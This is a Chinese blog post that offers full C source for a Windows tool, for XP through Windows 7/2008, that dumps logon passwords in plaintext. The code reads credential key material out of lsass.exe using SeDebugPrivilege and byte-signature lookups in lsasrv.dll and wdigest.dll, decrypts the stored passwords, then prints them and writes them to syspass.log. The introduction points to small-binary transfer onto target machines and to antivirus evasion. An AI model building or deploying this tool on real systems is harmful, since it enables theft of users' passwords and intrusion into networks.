[源码]一键获取windows系统登陆密码vc6版源码

[源码]一键获取windows系统登陆密码vc6版源码
支持:XP/2000/2003/WIN7/2008等

此版本编译出来的程序体积较小几十KB...
而vs版则1点几M,体积整整大了2-30倍
对某些奇葩环境...1点几M可能要分几十次传过去

总是在关键的时候,发现自己以前弄过的东西突然不见了
然后百度好不容易找到了一份..还是发到博客来 收藏
需要修改输出TXT的或免杀啥的...上自己博客找源码

#include <windows.h>
#include <stdio.h>

//
//  Vsbat[0x710dddd]
//
//  Note: build with VC++ 6.0 as a 32-bit executable and run it elevated (the
//  code enables SeDebugPrivilege and opens lsass.exe).  The lsasrv.dll /
//  wdigest.dll byte signatures below are build-specific: on a build where they
//  do not match, the lookups return NULL.  This program reads credential
//  material out of LSASS -- use it only on systems you are authorized to test.
//

// Size of MemBuf, the local copy of the key structure read out of lsass.exe.
#define MEM_SIZE 0x1000
// OS family tags stored in osKind (main) and switched on in CopyKeyGlobalData.
// They are only ever compared for equality, never combined as a bitmask.
#define WIN7     0x1
#define WINXP    0x2
#define WIN03    0x4

// Local mirror of the Win32 LSA_UNICODE_STRING (counted UTF-16 string, not
// guaranteed to be NUL-terminated).  Declared here because only windows.h and
// stdio.h are included; Buffer is what printSessionInfo prints.
typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} LSA_UNICODE_STRING , *PLSA_UNICODE_STRING ;

// Local mirror of SECURITY_LOGON_SESSION_DATA as returned by
// LsaGetLogonSessionData (secur32.dll).  The buffer is produced by the system
// and read through this layout, so field order and sizes must match the OS
// definition exactly.  Only UserName and LogonDomain are consumed in this file.
typedef struct _SECURITY_LOGON_SESSION_DATA {  
    ULONG Size;  
    LUID LogonId;
    LSA_UNICODE_STRING UserName;  
    LSA_UNICODE_STRING LogonDomain;  
    LSA_UNICODE_STRING AuthenticationPackage;  
    ULONG LogonType;  ULONG Session;  
    PSID Sid;  
    LARGE_INTEGER LogonTime;  
    LSA_UNICODE_STRING LogonServer;  
    LSA_UNICODE_STRING DnsDomainName;  
    LSA_UNICODE_STRING Upn;
} SECURITY_LOGON_SESSION_DATA,  *PSECURITY_LOGON_SESSION_DATA ;

// Function-pointer types for entry points resolved at run time:
//   NtQueryInformationProcess (ntdll.dll)               -> GetProcAddress
//   LsaEnumerateLogonSessions / LsaGetLogonSessionData /
//   LsaFreeReturnBuffer (Secur32.dll)                   -> GetProcAddress
//   pDECRIPTFUNC                                        -> byte-signature search
//                                                          inside lsasrv.dll
// Return types are int standing in for NTSTATUS; the callers treat 0 as
// success.  pDECRIPTFUNC's (buffer, length) shape is inferred from its single
// call site in main(), which prints the plaintext from the same buffer
// afterwards, i.e. the routine decrypts in place.
typedef int (__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG) ;
typedef int (__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *) ;
typedef int (__stdcall * pDECRIPTFUNC)(PBYTE, DWORD) ;
typedef int (__stdcall * pLSAFREERETURNBUFFER)(PVOID) ;
typedef int (__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *) ;

// Forward declarations for the helpers defined after main().  (k8writeTxt has
// no prototype because it is defined before main.)
int    EnableDebugPrivilege() ;
void   printHexBytes(PBYTE data, int nBytes) ;
PBYTE  search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) ;
void   CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) ;
HANDLE GetProcessHandleByName(const CHAR *szName) ;
LPVOID GetEncryptListHead() ;
void   printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID) ;

// Byte signature of the in-place decrypt routine in the .text section of
// lsasrv.dll.  Decodes as: mov edi,edi / push ebp / mov ebp,esp / push 0 /
// push [ebp+0Ch] / push [ebp+8] / call ... -- a hot-patchable prologue followed
// by a call.  Build-specific; main() calls whatever search_bytes finds.
BYTE DecryptfuncSign[] = { 0x8B, 0xFF, 0x55, 0x8B,
                           0xEC, 0x6A, 0x00, 0xFF,
                           0x75, 0x0C, 0xFF, 0x75,
                           0x08, 0xE8 } ;
    
// Signatures that sit next to the global pointer to the decryption key
// structure (lsasrv .text).  CopyKeyGlobalData reads the DWORD 4 bytes BEFORE
// the Win7 match and the DWORD immediately AFTER the XP match as that pointer's
// address.
//   Win7: xor edx,edx / mov dword [ebp-18h],8 / mov [ebp-1Ch],edx
//   XP:   lea eax,[ebp-110h] / push eax / push [ebp+10h] / push dword [imm32]
//         (the imm32 that follows is the address the code reads)
BYTE DecryptKeySign_WIN7[]  = { 0x33, 0xD2, 0xC7, 0x45, 0xE8, 0x08, 0x00, 0x00, 0x00, 0x89, 0x55, 0xE4 } ;
BYTE DecryptKeySign_XP[]    = { 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x75, 0x10, 0xFF, 0x35 } ;

// Signature near the credential list head in wdigest.dll .text:
// mov eax,[ebp+8] / mov [eax],ecx / mov dword [eax+4],imm32.
// GetEncryptListHead takes the DWORD 4 bytes before the LAST match as the list
// head address (presumably the immediate of the instruction that loaded ecx --
// unverified here).
BYTE KeyPointerSign[]  = { 0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04 } ;

// Global scratch buffers.  MemBuf / SecBuf / ThirdBuf receive copies of key
// structures read out of lsass.exe, and the local lsasrv.dll image is patched
// to point at them (CopyKeyGlobalData); only 0x200 bytes of MemBuf are used.
// Encryptdata holds one session's ciphertext and, after DecryptFunc, its
// plaintext (main) -- it is filled from a 16-bit length read out of lsass.
BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200] ;
BYTE Encryptdata[0x100] ;

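HANDLE GetProcessHandleByName(const CHAR *szName)
{
    //
    // Return an open handle to the first process whose image file name
    // (last path component, compared case-insensitively) equals szName, or
    // NULL if none is found.  The caller owns the handle (CloseHandle).
    //
    // Notes:
    //  - PIDs are brute-forced (multiples of 4 below 10000) rather than taken
    //    from a snapshot, so this is slow but needs no toolhelp import.
    //  - The handle is opened with just the rights the rest of this program
    //    uses on it (NtQueryInformationProcess + ReadProcessMemory) instead of
    //    PROCESS_ALL_ACCESS; opening lsass.exe still needs SeDebugPrivilege.
    //  - NtQueryInformationProcess class 27 (ProcessImageFileName) fills a
    //    UNICODE_STRING header followed by the string; Buffer+4 is the header's
    //    string pointer on a 32-bit build.  This code is 32-bit only.
    //
    // Fixes vs. the original: the backslash literal was mis-encoded with
    // typographic quotes (did not compile), the ntdll lookup and the string
    // pointer were not NULL-checked, and the backward scan walked one byte
    // before the array when the path had no backslash.
    //
    DWORD  dwProcessId, ReturnLength, nBytes;
    WCHAR  Buffer[MAX_PATH + 0x20];
    HANDLE hProcess;
    PWCHAR pRetStr;
    PCHAR  pCurName;
    CHAR   szCurrentPath[MAX_PATH];
    pNTQUERYPROCESSINFORMATION NtQueryInformationProcess;

    if (szName == NULL)
        return NULL;

    NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(
            GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess");
    if (NtQueryInformationProcess == NULL)
    {
        puts("NtQueryInformationProcess not found");
        return NULL;
    }

    // Process IDs are always multiples of 4.
    for (dwProcessId = 4; dwProcessId < 10 * 1000; dwProcessId += 4)
    {
        hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessId);
        if (hProcess == NULL)
            continue;

        // 0 == STATUS_SUCCESS
        if (NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength) == 0)
        {
            pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4));
            nBytes  = (pRetStr != NULL)
                    ? WideCharToMultiByte(CP_ACP, 0, pRetStr, -1, szCurrentPath, MAX_PATH, NULL, NULL)
                    : 0;
            // nBytes counts the terminating NUL, so > 1 means a non-empty path.
            if (nBytes > 1)
            {
                // Walk back from the NUL to just after the last '\' (or to the start).
                pCurName = &szCurrentPath[nBytes - 1];
                while (pCurName > szCurrentPath && pCurName[-1] != '\\')
                    pCurName--;
                if (lstrcmpi(szName, pCurName) == 0)
                    return hProcess;
            }
        }
        CloseHandle(hProcess);
    }
    return NULL;
}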

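LPVOID GetEncryptListHead()
{
    //
    // Locate the address of the global credential list head that main() walks
    // inside lsass.exe.
    //
    // Method: wdigest.dll is loaded into this process, its image is scanned
    // from the base up to SpInstanceInit for the LAST occurrence of
    // KeyPointerSign, and the 4 bytes immediately before that match are read
    // as the list-head address (presumably an immediate operand of the
    // instruction preceding the signature; the pattern is build-specific).
    //
    // Assumption: the value is used as an address inside lsass.exe, so
    // wdigest.dll must be mapped at the same base there as here -- TODO confirm
    // on the target OS.
    //
    // Returns NULL when wdigest.dll cannot be loaded, SpInstanceInit is not
    // exported, or the signature is not found.  (The original dereferenced 4
    // bytes before the module base in the not-found case.)
    //
    HINSTANCE hMod;
    PBYTE     pEndAddr, pMatch, pLast;
    LPVOID    KeyPointer;

    hMod = LoadLibrary("wdigest.dll");
    if (hMod == NULL)
        return NULL;

    pEndAddr = (PBYTE)GetProcAddress(hMod, "SpInstanceInit");
    if (pEndAddr == NULL)
    {
        FreeLibrary(hMod);
        return NULL;
    }

    // Keep the last match before SpInstanceInit; the scan starts one
    // signature-length past the base, exactly as the original did.
    pLast  = NULL;
    pMatch = search_bytes((PBYTE)hMod + sizeof(KeyPointerSign), pEndAddr,
                          KeyPointerSign, sizeof(KeyPointerSign));
    while (pMatch != NULL && pMatch < pEndAddr)
    {
        pLast  = pMatch;
        pMatch = search_bytes(pMatch + sizeof(KeyPointerSign), pEndAddr,
                              KeyPointerSign, sizeof(KeyPointerSign));
    }

    if (pLast == NULL)
    {
        FreeLibrary(hMod);
        return NULL;
    }
    KeyPointer = (LPVOID)(*(DWORD *)(pLast - 4));
    FreeLibrary(hMod);
    return KeyPointer;
}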

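void k8writeTxt(const char *logtext)
{
    //
    // Append logtext to "syspass.log" in the current directory.
    //
    // Security note: this stores recovered credential material on disk in
    // plain text with no protection; anyone who can read the file gets it.
    //
    // Known limitation (unchanged): main() prints Encryptdata with %S (UTF-16)
    // but passes the same buffer here cast to char*, so strlen() stops at the
    // first zero byte and only the leading bytes reach the log.  sizeof(ptr)
    // was tried earlier and is wrong for a different reason -- it is the size
    // of the pointer, not of the string.
    //
    // Fixes vs. the original: fopen failure no longer leads to fclose(NULL),
    // and a short fwrite is reported.  fclose does not append any terminator.
    //
    FILE  *pFile;
    size_t len;

    if (logtext == NULL)
        return;
    len = strlen(logtext);
    if (len == 0)
        return;

    pFile = fopen("syspass.log", "a+");
    if (pFile == NULL)
    {
        puts("fopen syspass.log fail");
        return;
    }
    if (fwrite(logtext, 1, len, pFile) != len)
        puts("fwrite syspass.log fail");
    fclose(pFile);
}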

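int main()
{
    //
    // Entry point.  Flow:
    //   1. enable SeDebugPrivilege and open lsass.exe;
    //   2. pick per-OS constants: dwVerOff is the distance from the LUID in a
    //      list entry to the ciphertext descriptor, osKind selects the key
    //      signature used by CopyKeyGlobalData (any 6.x build is WIN7);
    //   3. load lsasrv.dll locally and find the decrypt routine by signature;
    //   4. find the credential list head inside wdigest.dll;
    //   5. copy lsass's key state over this process's lsasrv image;
    //   6. for every logon session, walk lsass's list for the matching LUID,
    //      read the ciphertext, decrypt it in-process, print and log it.
    //
    // 32-bit only: pointers are truncated to DWORD throughout and the same
    // module bases are assumed in lsass.exe and in this process.
    //
    // Fixes vs. the original listing: every signature lookup, library load,
    // export lookup and remote read is checked before its result is used; the
    // ciphertext length (a 16-bit value read out of lsass memory) is bounded
    // by the local buffer instead of overflowing it; the list walk stops on a
    // failed read or after a cap instead of spinning; a match on the LAST
    // list entry is no longer reported as "not found" (its Flink equals the
    // head, which the original used as the not-found test); the lsasrv scan
    // ends at SizeOfImage rather than at a fixed 0x7fffdddd; and the OS
    // version printf uses a matching format specifier.
    //
    HINSTANCE hModlsasrv, hModSecur32;
    DWORD     LogonSessionCount, i, dwBytesRead, dwVerOff;
    int       osKind;
    PLUID     LogonSessionList, pCurLUID, pListLUID;
    BYTE      EncryptBuf[0x200];
    HANDLE    hProcess;
    OSVERSIONINFO VersionInformation;
    pDECRIPTFUNC  DecryptFunc;
    LPVOID    ListHead, pEncrypt;
    PBYTE     pLsasrvEnd;
    PIMAGE_DOS_HEADER pDos;
    PIMAGE_NT_HEADERS pNt;
    pLSAENUMERATELOGONSESSIONS  LsaEnumerateLogonSessions;
    pLSAGETLOGONSESSIONDATA     LsaGetLogonSessionData;
    pLSAFREERETURNBUFFER        LsaFreeReturnBuffer;

    hModSecur32       = NULL;
    LogonSessionList  = NULL;
    LogonSessionCount = 0;
    LsaFreeReturnBuffer = NULL;

    if (EnableDebugPrivilege() != 1)
        puts("EnableDebugPrivilege fail !");

    hProcess = GetProcessHandleByName("lsass.exe");
    if (hProcess == NULL)
    {
        puts("GetProcessHandleByName fail !");
        puts("Try To Run As Administrator ...");
        system("echo Press any Key to Continue ... & pause > nul");
        return 0;
    }

    // OS version -> list-entry offset + key-signature family.
    memset(&VersionInformation, 0, sizeof(VersionInformation));
    VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation);
    GetVersionEx(&VersionInformation);
    dwVerOff = 0;
    osKind   = -1;
    if (VersionInformation.dwMajorVersion == 5)
    {
        if (VersionInformation.dwMinorVersion == 1)
        {
            dwVerOff = 36;
            osKind   = WINXP;
        }
        else if (VersionInformation.dwMinorVersion == 2)
        {
            dwVerOff = 28;
            osKind   = WIN03;
        }
    }
    else if (VersionInformation.dwMajorVersion == 6)
    {
        dwVerOff = 32;
        osKind   = WIN7;
    }
    if (osKind == -1)
    {
        printf("[Undefined OS version]  Major: %lu Minor: %lu\n",
               (unsigned long)VersionInformation.dwMajorVersion,
               (unsigned long)VersionInformation.dwMinorVersion);
        system("echo Press any Key to Continue ... & pause > nul");
        CloseHandle(hProcess);
        return 0;
    }

    // Locate the decrypt routine by signature in a local copy of lsasrv.dll.
    hModlsasrv = LoadLibrary("lsasrv.dll");
    if (hModlsasrv == NULL)
    {
        puts("LoadLibrary lsasrv.dll fail !");
        CloseHandle(hProcess);
        return 0;
    }
    pDos       = (PIMAGE_DOS_HEADER)hModlsasrv;
    pNt        = (PIMAGE_NT_HEADERS)((PBYTE)hModlsasrv + pDos->e_lfanew);
    pLsasrvEnd = (PBYTE)hModlsasrv + pNt->OptionalHeader.SizeOfImage;
    DecryptFunc = (pDECRIPTFUNC)search_bytes((PBYTE)hModlsasrv, pLsasrvEnd,
                                             DecryptfuncSign, sizeof(DecryptfuncSign));
    if (DecryptFunc == NULL)
    {
        puts("Decrypt function signature NOT found (unsupported lsasrv.dll build)");
        goto done;
    }

    // Address (inside lsass) of the credential list head.
    ListHead = GetEncryptListHead();
    if (ListHead == NULL)
    {
        puts("Credential list head NOT found (unsupported wdigest.dll build)");
        goto done;
    }

    // Mirror lsass's key state into this process (void: failures are printed
    // by the callee but cannot be detected here).
    CopyKeyGlobalData(hProcess, hModlsasrv, osKind);

    hModSecur32 = LoadLibrary("Secur32.dll");
    if (hModSecur32 == NULL)
    {
        puts("LoadLibrary Secur32.dll fail !");
        goto done;
    }
    LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions");
    LsaGetLogonSessionData    = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData");
    LsaFreeReturnBuffer       = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer");
    if (LsaEnumerateLogonSessions == NULL || LsaGetLogonSessionData == NULL || LsaFreeReturnBuffer == NULL)
    {
        puts("Secur32 exports NOT found !");
        goto done;
    }

    // 0 == STATUS_SUCCESS
    if (LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList) != 0 || LogonSessionList == NULL)
    {
        puts("LsaEnumerateLogonSessions fail !");
        LogonSessionList = NULL;
        goto done;
    }

    for (i = 0; i < LogonSessionCount; i++)
    {
        DWORD  nBytes, guard;
        PBYTE  pFinal;
        LPVOID pNext;

        pCurLUID = &LogonSessionList[i];
        printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID);

        // Walk lsass's list: Flink at entry+0, LUID at entry+0x10.  Stop when
        // Flink points back at the head, on a failed read, or at the cap.
        pListLUID = NULL;
        if (!ReadProcessMemory(hProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead))
        {
            puts("ReadProcessMemory(list head) fail\n");
            continue;
        }
        for (guard = 0; guard < 0x10000 && *(DWORD *)EncryptBuf != (DWORD)ListHead; guard++)
        {
            pNext = (LPVOID)(*(DWORD *)EncryptBuf);
            if (!ReadProcessMemory(hProcess, pNext, EncryptBuf, 0x100, &dwBytesRead))
                break;
            if (((PLUID)(EncryptBuf + 0x10))->LowPart  == pCurLUID->LowPart &&
                ((PLUID)(EncryptBuf + 0x10))->HighPart == pCurLUID->HighPart)
            {
                pListLUID = (PLUID)(EncryptBuf + 0x10);
                break;
            }
        }
        if (pListLUID == NULL)
        {
            puts("Specific LUID NOT found\n");
            continue;
        }

        // Ciphertext descriptor sits dwVerOff bytes past the LUID; the original
        // reads a 16-bit length at +2 and the remote buffer address at +4
        // (the +2 field looks like MaximumLength of an LSA_UNICODE_STRING-
        // shaped descriptor -- kept as is).  dwVerOff <= 36 keeps these reads
        // well inside EncryptBuf.
        pFinal   = (PBYTE)pListLUID + dwVerOff;
        nBytes   = *(WORD *)(pFinal + 2);
        pEncrypt = (LPVOID)(*(DWORD *)(pFinal + 4));

        // Leave at least two zero bytes so the UTF-16 print below terminates.
        if (nBytes == 0 || nBytes > sizeof(Encryptdata) - 2 || pEncrypt == NULL)
        {
            printf("ciphertext length %lu out of range, skipped\n\n", (unsigned long)nBytes);
            continue;
        }
        memset(Encryptdata, 0, sizeof(Encryptdata));
        if (!ReadProcessMemory(hProcess, pEncrypt, Encryptdata, nBytes, &dwBytesRead))
        {
            puts("ReadProcessMemory(ciphertext) fail\n");
            continue;
        }

        // Decrypt in place with lsasrv's own routine, print and log.
        DecryptFunc(Encryptdata, nBytes);
        printf("password: %S\n\n", Encryptdata);
        k8writeTxt((char *)Encryptdata);
        // Do not keep plaintext in the global longer than needed.
        memset(Encryptdata, 0, sizeof(Encryptdata));
    }

done:
    if (LogonSessionList != NULL && LsaFreeReturnBuffer != NULL)
        LsaFreeReturnBuffer(LogonSessionList);
    CloseHandle(hProcess);
    FreeLibrary(hModlsasrv);
    if (hModSecur32 != NULL)
        FreeLibrary(hModSecur32);
    if (osKind == WIN7)
    {
        // Paired with the LoadLibrary calls in CopyKeyGlobalData; FreeLibrary
        // of a NULL handle (if they were never loaded) just fails harmlessly.
        FreeLibrary(GetModuleHandle("bcrypt.dll"));
        FreeLibrary(GetModuleHandle("bcryptprimitives.dll"));
    }

    system("echo Press any Key to EXIT ... & pause > nul");
    return 0;
}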

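// Print one labelled LSA_UNICODE_STRING.  An explicit precision derived from
// Length (a byte count per the Win32 LSA_UNICODE_STRING definition this file
// mirrors) keeps printf from running past a buffer that is not NUL-terminated.
static void print_lsa_string(const char *label, const LSA_UNICODE_STRING *s)
{
    if (s->Buffer == NULL)
        printf("%s: (null)\n", label);
    else
        printf("%s: %.*S\n", label, (int)(s->Length / sizeof(WCHAR)), s->Buffer);
}

void printSessionInfo(pLSAGETLOGONSESSIONDATA  LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{
    //
    // Print the user name and logon domain of the logon session identified
    // by pCurLUID, using the Secur32 entry points resolved by the caller.
    //
    // LsaGetLogonSessionData is treated as returning 0 on success (the
    // convention every other Lsa*/Nt* call in this file uses).  Fixes vs. the
    // original: the status and the returned pointer are checked before being
    // dereferenced, NULL string buffers are tolerated, and strings are
    // printed bounded by their Length.
    //
    PSECURITY_LOGON_SESSION_DATA pLogonSessionData = NULL;

    if (LsaGetLogonSessionData == NULL || LsaFreeReturnBuffer == NULL || pCurLUID == NULL)
        return;

    if (LsaGetLogonSessionData(pCurLUID, &pLogonSessionData) != 0 || pLogonSessionData == NULL)
    {
        puts("LsaGetLogonSessionData fail");
        return;
    }

    print_lsa_string("UserName",    &pLogonSessionData->UserName);
    print_lsa_string("LogonDomain", &pLogonSessionData->LogonDomain);

    LsaFreeReturnBuffer(pLogonSessionData);
}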

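int EnableDebugPrivilege()
{
    //
    // Enable SeDebugPrivilege in the current process token.
    // Returns 1 on success, 0 on failure (a message is printed on failure).
    //
    // Fixes vs. the original: the token handle is closed on every path; only
    // TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY is requested instead of
    // TOKEN_ALL_ACCESS; and the ERROR_NOT_ALL_ASSIGNED case is reported --
    // AdjustTokenPrivileges returns TRUE even when the privilege is absent
    // from the token (typically a non-elevated user), which the original
    // silently took as success and then failed later on OpenProcess(lsass).
    //
    HANDLE hToken = NULL;
    LUID   sedebugnameValue;
    TOKEN_PRIVILEGES tkp;
    int    rc = 0;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        puts("OpenProcessToken fail");
        return 0;
    }
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        puts("LookupPrivilegeValue fail");
        CloseHandle(hToken);
        return 0;
    }

    memset(&tkp, 0, sizeof(tkp));
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
        puts("AdjustTokenPrivileges fail");
    else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        puts("SeDebugPrivilege is not held by this token (not elevated?)");
    else
        rc = 1;

    CloseHandle(hToken);
    return rc;
}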

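PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
    //
    // Find the first occurrence of the nsize-byte pattern pBytes in the
    // memory range [pBegin, pEnd).  A match must fit entirely before pEnd.
    // Returns the address of the match, or NULL if there is none.
    //
    // Callers scan whole module images with this (lsasrv.dll, wdigest.dll);
    // nothing guarantees the pattern is unique, so they get the lowest match.
    //
    // Fixes vs. the original: `count` was read uninitialized when the range
    // was shorter than the pattern, NULL inputs were dereferenced, and an
    // empty pattern "matched" at pBegin; all three now return NULL.
    //
    PBYTE pCur;
    DWORD k;

    if (pBegin == NULL || pEnd == NULL || pBytes == NULL || nsize == 0)
        return NULL;

    for (pCur = pBegin; pCur + nsize <= pEnd; pCur++)
    {
        for (k = 0; k < nsize && pCur[k] == pBytes[k]; k++)
            ;
        if (k == nsize)
            return pCur;
    }
    return NULL;
}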

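void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
    //
    // Make this process's copy of lsasrv.dll usable for decryption by
    // mirroring the key material that lives in lsass.exe:
    //
    //  1. the section described by the SECOND section header of lsasrv.dll
    //     (the original hard-codes that index, presumably .data -- TODO
    //     confirm on every supported build) is read out of lsass onto the
    //     same addresses in this process, which assumes lsasrv.dll is mapped
    //     at the same base in both processes;
    //  2. an OS-specific signature locates the global pointer to the key
    //     structure; the structure it points to in lsass is copied into
    //     MemBuf and the local global is repointed at MemBuf;
    //  3. on osKind == WIN7 (any 6.x build), two further pointers at
    //     MemBuf+8 and MemBuf+0xC are dereferenced remotely into SecBuf /
    //     ThirdBuf and repointed the same way, and bcrypt.dll /
    //     bcryptprimitives.dll are loaded because the decrypt routine calls
    //     into them (main() frees them afterwards).
    //
    // The signature-relative offsets (+sizeof(sign) on XP/2003, -4 on 6.x)
    // are taken verbatim from the original; they presumably pick the
    // immediate operand next to the matched instruction bytes.
    //
    // The function is void and callers cannot see failure, so every lookup
    // and remote read is checked and a diagnostic printed; on failure we
    // return with the local image left partially patched rather than
    // dereference NULL (the original crashed on an unsupported build).
    //
    PIMAGE_DOS_HEADER     pDosHead;
    PIMAGE_NT_HEADERS     pPEHead;
    PIMAGE_SECTION_HEADER pSectionHead;
    DWORD                 dwBytes, dwBytesRead;
    PBYTE                 pModBase, pEndAddr, pSig;
    LPVOID                pdataAddr, pDecryptKey, DecryptKey, pSub;

    if (hProcess == NULL || hModlsasrv == NULL)
    {
        puts("CopyKeyGlobalData: bad arguments");
        return;
    }

    pModBase = (PBYTE)hModlsasrv;
    pDosHead = (PIMAGE_DOS_HEADER)pModBase;
    pPEHead  = (PIMAGE_NT_HEADERS)(pModBase + pDosHead->e_lfanew);
    pEndAddr = pModBase + pPEHead->OptionalHeader.SizeOfImage;
    // Second section header (first + 1), as in the original.
    pSectionHead = IMAGE_FIRST_SECTION(pPEHead) + 1;

    // Step 1: overlay that section with lsass's copy.  The page rounding is
    // the original's (it always adds a page, even for an exact multiple).
    // A failed read is reported but not fatal -- the remaining steps still
    // fetch the key structure directly from lsass.
    pdataAddr = pModBase + pSectionHead->VirtualAddress;
    dwBytes   = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000;
    if (!ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead))
        puts("CopyKeyGlobalData: ReadProcessMemory(section) fail");

    // Step 2: find the address of the global key pointer.
    pDecryptKey = NULL;
    switch (osKind)
    {
    case WINXP:
    case WIN03:
        pSig = search_bytes(pModBase, pEndAddr, DecryptKeySign_XP, sizeof(DecryptKeySign_XP));
        if (pSig == NULL)
        {
            puts("CopyKeyGlobalData: XP/2003 key signature NOT found");
            return;
        }
        // DWORD right after the signature (the push [imm32] operand).
        pDecryptKey = (LPVOID)(*(DWORD *)(pSig + sizeof(DecryptKeySign_XP)));
        break;

    case WIN7:
        // The decrypt routine calls into these on 6.x.
        LoadLibrary("bcrypt.dll");
        LoadLibrary("bcryptprimitives.dll");
        pSig = search_bytes(pModBase, pEndAddr, DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7));
        if (pSig == NULL)
        {
            puts("CopyKeyGlobalData: WIN7 key signature NOT found");
            return;
        }
        // DWORD right before the signature.
        pDecryptKey = (LPVOID)(*(DWORD *)(pSig - 4));
        break;

    default:
        printf("CopyKeyGlobalData: unknown osKind %d\n", osKind);
        return;
    }

    // Read the remote key-structure pointer, then the structure itself, and
    // repoint the local global at the local copy.
    if (pDecryptKey == NULL ||
        !ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, sizeof(DecryptKey), &dwBytesRead))
    {
        puts("CopyKeyGlobalData: ReadProcessMemory(key pointer) fail");
        return;
    }
    if (DecryptKey == NULL ||
        !ReadProcessMemory(hProcess, DecryptKey, MemBuf, 0x200, &dwBytesRead))
    {
        puts("CopyKeyGlobalData: ReadProcessMemory(key structure) fail");
        return;
    }
    *(DWORD *)pDecryptKey = (DWORD)MemBuf;

    if (osKind != WIN7)
        return;

    // Step 3 (6.x only): two nested structures referenced from the key structure.
    pSub = (LPVOID)(*(DWORD *)(MemBuf + 8));
    if (pSub == NULL || !ReadProcessMemory(hProcess, pSub, SecBuf, 0x200, &dwBytesRead))
    {
        puts("CopyKeyGlobalData: ReadProcessMemory(key+8) fail");
        return;
    }
    *(DWORD *)(MemBuf + 8) = (DWORD)SecBuf;

    pSub = (LPVOID)(*(DWORD *)(MemBuf + 0xC));
    if (pSub == NULL || !ReadProcessMemory(hProcess, pSub, ThirdBuf, 0x200, &dwBytesRead))
    {
        puts("CopyKeyGlobalData: ReadProcessMemory(key+0xC) fail");
        return;
    }
    *(DWORD *)(MemBuf + 0xC) = (DWORD)ThirdBuf;
}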

// -- EOF -- //

原文地址:https://www.cnblogs.com/k8gege/p/10261372.html

时间: 2024-10-10 21:36:01
